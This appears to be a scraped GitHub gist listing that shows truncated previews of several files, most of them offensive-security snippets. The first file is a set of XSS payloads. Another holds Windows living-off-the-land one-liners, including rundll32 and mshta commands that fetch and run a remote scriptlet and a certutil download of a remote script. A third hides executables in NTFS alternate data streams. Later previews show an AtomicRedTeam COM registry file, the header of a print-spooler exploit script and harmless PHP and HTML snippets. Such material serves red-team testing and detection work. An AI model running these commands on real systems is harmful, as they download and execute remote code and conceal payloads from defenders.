<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Add content to ADS | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
@="AtomicRedTeam" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
@="{00000001-0000-0000-0000-0000FEEDACDC}" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
@="AtomicRedTeam" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
@="{00000001-0000-0000-0000-0000FEEDACDC}" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
# some code from https://www.exploit-db.com/exploits/2879/ | |
import os | |
import sys | |
import argparse | |
import binascii | |
import ConfigParser |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#____ ____ __ | |
#\ \ / /____ _____/ |_ ___________ | |
# \ Y // __ \_/ ___\ __\/ _ \_ __ \ | |
# \ /\ ___/\ \___| | ( <_> ) | \/ | |
# \___/ \___ >\___ >__| \____/|__| | |
# \/ \/ | |
#--Licensed under GNU GPL 3 | |
#----Authored by Vector/NullArray | |
############################################## |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* File Manager Script | |
*/ | |
// Default language ('en' and other from 'filemanager-l10n.php') | |
$lang = 'en'; | |
// Auth with login/password (set true/false to enable/disable it) | |
$use_auth = true; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Configuration | |
$title = 'Internal Image Hosting Script'; | |
$filedir = 'up'; // uploaded image dir | |
$maxsize = 5242880; //max size in bytes | |
$allowedExts = array('png', 'jpg', 'jpeg', 'gif'); | |
$allowedMime = array('image/png', 'image/jpeg', 'image/pjpeg', 'image/gif'); | |
$baseurl = $_SERVER['HTTP_HOST'].dirname($_SERVER['REQUEST_URI']).'/'.$filedir; | |
function compressImage($source_url, $destination_url, $quality) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8" /> | |
<title>Formalize CSS</title> | |
</head> | |
<body> | |
<div id="wrapper"> | |
<h1> | |
Example of all form elements |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
* Filename: SimpleAuth.php | |
* Version: 1.0 | |
* Author: Heiswayi Nrird | |
* Dscription: Simple PHP script to protect any PHP page using session | |
* Website: https://heiswayi.nrird.com | |
* | |
* HOW TO USE | |
* ========== |